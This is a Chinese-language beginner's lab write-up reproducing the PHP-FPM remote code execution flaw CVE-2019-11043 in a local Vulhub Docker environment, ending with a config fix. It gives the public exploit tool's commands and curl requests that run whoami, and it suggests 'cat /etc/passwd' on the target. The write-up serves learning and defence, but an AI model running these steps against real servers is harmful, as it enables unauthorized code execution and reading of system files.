【渗透测试小白系列】之PHP-FRM远程代码执行漏洞(CVE-2019-11043)复现

早过忘川 提交于 2019-12-03 12:20:27

(本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦)

 

该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!

 

一、介绍

CVE-2019-11043:远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码,向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常

  • 该漏洞需要在nginx.conf中进行特定配置才能触发,具体配置如下
1 location ~ [^/]\.php(/|$) {
2  ...
3  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
4  fastcgi_param PATH_INFO $fastcgi_path_info;
5  fastcgi_pass   php:9000;
6  ...
7 }
  • 攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp,Regexp被损坏导致PATH_INFO为空,从而触发该漏洞
  • 影响范围:PHP5.6-7.x

(介绍源于http://blog.leanote.com/post/snowming/9da184ef24bd十分详细,感谢!!!)

 

二、漏洞复现过程

1.环境准备

  • 使用之前在Kali中安装的Docker进行复现,安装过程请参考https://www.cnblogs.com/yankaohaitaiwei/p/11788333.htm
  • 在Kali中还需安装工具phuip-fpizdam(在Kali中安装该工具方便测试,这时攻击者和靶机都是同一个Kali,如果不想攻击者和靶机是同一个,在攻击者主机上安装该工具,并且攻击者必须与靶机连通)
    • 下载phuip-fpizdam
git clone https://github.com/neex/phuip-fpizdam

    • 进入到下载好的phuip-fpizdam目录中,可以看到有很多.go文件,说明该工具需要go语言的环境支持

    • 安装go环境
go  查看环境中是否有go环境,有的话会返回帮助信息
apt install golang-go  安装go
go version  查看go版本

    • 安装phuip-fpizdam
go get -u github.com/neex/phuip-fpizdam

2.启动Docker,进入Vulhub下的php目录下的CVE-2019-11043中,启动整个环境

/etc/init.d/docker start

cd vulhub-master/
cd php
cd CVE-2019-11043

docker-compose up -d

3.查看端口

docker ps  列出所有在运行的容器信息

4.根据回显,在宿主机的浏览器上访问使用Vulhub搭建好的所存有漏洞的站点

5.回到Kali,启动工具phuip-fpizdam

1 cd go/bin
2 ./phuip-fpizdam

6.检验漏洞是否存在

./phuip-fpizdam http://127.0.0.1:8080/index.php

  • 根据回显可知漏洞存在,且漏洞的利用方式也给出了

7.漏洞利用,也可将whoami换成其他命令,如:ls、cat /etc/passwd等等,这里不做过多演示

  • 更换为ifconfig命令可能不会成功,可能是Docker环境不支持ifconfig
curl "http://127.0.0.1:8080/index.php?a=whoami"
  • 如果一次运行没有成功,多试几次即可

 

三、修复

1.查看运行的Docker

docker ps

2.进入容器内部,并在Nginx配置文件下查找fastcgi_split_path_info

1 docker exec -it b92dfa82075b /bin/bash
2 grep -Rin --color 'fastcgi_split_path_info' /etc/nginx/

3.读取Nginx的配置文件,找到fastcgi_split_path_info(用作URL匹配)和fastcgi_param PATH_INFO,将其注释即可完成修复

1 cat /etc/nginx/conf.d/default.conf
2 或
3 curl "http://127.0.0.1:8080/index.php?=cat /etc/nginx/conf.d/default.conf"  利用漏洞

 

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!